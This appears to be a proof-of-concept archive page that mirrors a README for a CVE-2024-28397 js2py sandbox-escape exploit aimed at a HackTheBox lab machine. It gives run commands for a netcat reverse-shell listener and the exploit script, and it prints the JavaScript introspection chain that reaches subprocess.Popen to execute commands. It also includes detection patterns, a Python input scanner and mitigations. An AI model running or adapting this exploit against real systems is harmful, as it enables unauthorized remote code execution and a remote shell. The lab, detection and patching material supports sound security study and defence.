Related vulnerability
Title:
Js2Py security vulnerability
(CVE-2024-28397)
Description: Js2Py is a library of the Python Foundation used to translate JavaScript into Python code. Js2Py 0.74 and earlier contain a security vulnerability that stems from an issue in the js2py.disable_pyimport() component; an attacker can exploit it to execute arbitrary code through a crafted API call.
Description
This repository contains a python exploit code for CVE-2024-28397 intended for use on the "CodePartTwo" machine on Hack The Box (HTB).
Introduction
# CVE-2024-28397 js2py Sandbox Escape Exploit - (CodePartTwo - HTB)
A Python exploit code for **CVE-2024-28397**, a critical vulnerability in js2py <= 0.74 that allows sandbox escape and remote code execution.
## 🚨 Vulnerability Details
- **CVE ID**: CVE-2024-28397
- **Affected Software**: js2py <= 0.74
- **Severity**: Critical (CVSS 9.8)
- **Type**: Sandbox Escape / Remote Code Execution
- **Discovery Date**: February 2024
### Description
js2py is a popular Python library for evaluating JavaScript code within Python environments. This vulnerability allows attackers to escape the js2py sandbox environment and execute arbitrary Python/system commands, even when `js2py.disable_pyimport()` is enabled.
The exploit leverages Python's object introspection capabilities through JavaScript to access the `subprocess.Popen` class and execute system commands.
## 🎯 Affected Applications
- Web applications using js2py for JavaScript evaluation
- Code execution platforms (like online code editors)
- Web scrapers that parse JavaScript
- Any application that processes untrusted JavaScript via js2py
## 🚀 Usage
### Prerequisites
```bash
pip install requests
```
### Basic Usage
```bash
# Start netcat listener
nc -lnvp 4444
# Run exploit
python3 exploit.py --target http://target.com:8000/run_code --lhost 10.10.14.100 --lport 4444
```
### Command Line Options
```
--target Target URL endpoint (required)
--lhost Local IP for reverse shell (required)
--lport Local port for reverse shell (default: 4444)
```
### Example
```bash
python3 exploit.py --target http://10.10.11.82:8000/run_code --lhost 10.10.14.100
```
## 🔧 How It Works
1. **Payload Generation**: Creates a base64-encoded reverse shell command
2. **Sandbox Escape**: Uses JavaScript to access Python's object hierarchy via `__class__` and `__base__`
3. **Process Execution**: Locates `subprocess.Popen` through introspection
4. **Command Execution**: Executes the reverse shell command using Popen
5. **Shell Establishment**: Connects back to the attacker's machine
### Technical Details
The exploit works by:
- Accessing `Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__`
- Walking through Python's object hierarchy using `__subclasses__()`
- Finding the `subprocess.Popen` class
- Creating a new process to execute the reverse shell
## 📝 Exploit Code Structure
```javascript
// Access Python object hierarchy
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a, "__class__"), "__base__");

// Find subprocess.Popen class
function findpopen(o) {
    // Recursive search through subclasses
    for (let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
    }
}

// Execute command (cmd is the shell command string substituted in by exploit.py)
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```
## 🛡️ Detection
Look for JavaScript code containing:
- `__class__` or `___class___` attribute access
- `__subclasses__()` method calls
- References to `subprocess` or `Popen`
- Base64 encoded payloads with `printf` and `base64 -d`
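The following is an added example, not part of this repository, showing how a service that feeds untrusted JavaScript into js2py could screen input for the indicators listed above before evaluation. The indicator weights, the alert threshold and the sample inputs are my own constructions; the check takes the evaluator as a callable so it runs offline without js2py installed.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Indicator patterns for the introspection chain used in the CVE-2024-28397
# sandbox escape: (name, regex, weight). Weights are an assumption chosen so
# that a lone dunder access (common in harmless code) stays below the alert
# threshold while the class -> base -> __subclasses__ chain scores high.
INDICATORS: List[Tuple[str, re.Pattern, int]] = [
    ("dunder_class", re.compile(r"_{2,3}class_{2,3}"), 2),
    ("dunder_base", re.compile(r"_{2,3}base_{2,3}"), 2),
    ("subclasses_call", re.compile(r"__subclasses__\s*\("), 3),
    ("getattribute", re.compile(r"__getattribute__"), 2),
    ("subprocess_ref", re.compile(r"\bsubprocess\b|\bPopen\b"), 3),
    ("b64_shell", re.compile(r"base64\s+-d|printf\s+.*\|\s*base64"), 2),
]
ALERT_THRESHOLD = 5  # assumption: tune against your own traffic


@dataclass
class ScanResult:
    score: int
    hits: List[str]

    @property
    def suspicious(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def scan_js(source: str) -> ScanResult:
    """Return the matched indicator names and their summed weight."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if pattern.search(source):
            hits.append(name)
            score += weight
    return ScanResult(score, hits)


def guarded_eval(source: str, evaluator: Callable[[str], object]) -> object:
    """Refuse to evaluate scripts that trip the detector; otherwise delegate.

    `evaluator` would be js2py.eval_js in a real deployment (hypothetical
    wiring, not shown here so the example runs without js2py).
    """
    result = scan_js(source)
    if result.suspicious:
        raise ValueError(f"blocked JavaScript: score={result.score} hits={result.hits}")
    return evaluator(source)


# Constructed samples (not captured traffic).
BENIGN_SAMPLE = "function add(a, b) { return a + b; }"
# A harmless script that merely uses a property named __class__.
LOW_SAMPLE = 'var cfg = { __class__: "widget" }; console.log(cfg.__class__);'
# The introspection chain from the README, without the command execution step.
ESCAPE_SAMPLE = (
    "let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;\n"
    'let obj = a(a(a, "__class__"), "__base__");\n'
    "for (let i in obj.__subclasses__()) {}"
)

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SAMPLE), ("low", LOW_SAMPLE), ("escape", ESCAPE_SAMPLE)]:
        r = scan_js(sample)
        print(f"{label:7s} score={r.score:2d} suspicious={r.suspicious} hits={r.hits}")
    try:
        guarded_eval(ESCAPE_SAMPLE, lambda s: "evaluated")
    except ValueError as exc:
        print(exc)
```

A pattern check of this kind only flags the straightforward form of the chain; it is a logging and triage aid to pair with the upgrade to a patched js2py, not a replacement for it.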
## 🔒 Mitigation
1. **Update js2py**: Upgrade to a patched version (> 0.74)
2. **Input Validation**: Sanitize JavaScript code before execution
3. **Sandboxing**: Use additional containerization (Docker, chroot)
4. **Code Review**: Audit JavaScript execution contexts
5. **WAF Rules**: Block suspicious JavaScript patterns
## ⚠️ Legal Disclaimer
This tool is for **authorized penetration testing and educational purposes only**. Users are responsible for complying with applicable laws and regulations. Unauthorized access to computer systems is illegal.
## 📚 References
- [Original CVE Report](https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)
- [CVE-2024-28397 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
## 📄 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
File snapshot
[4.0K] /data/pocs/9c63e9cf6f959a302ee72d2a4adeacec48859c89
├── [4.6K] exploit.py
├── [1.0K] LICENSE
└── [4.1K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source has expired or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.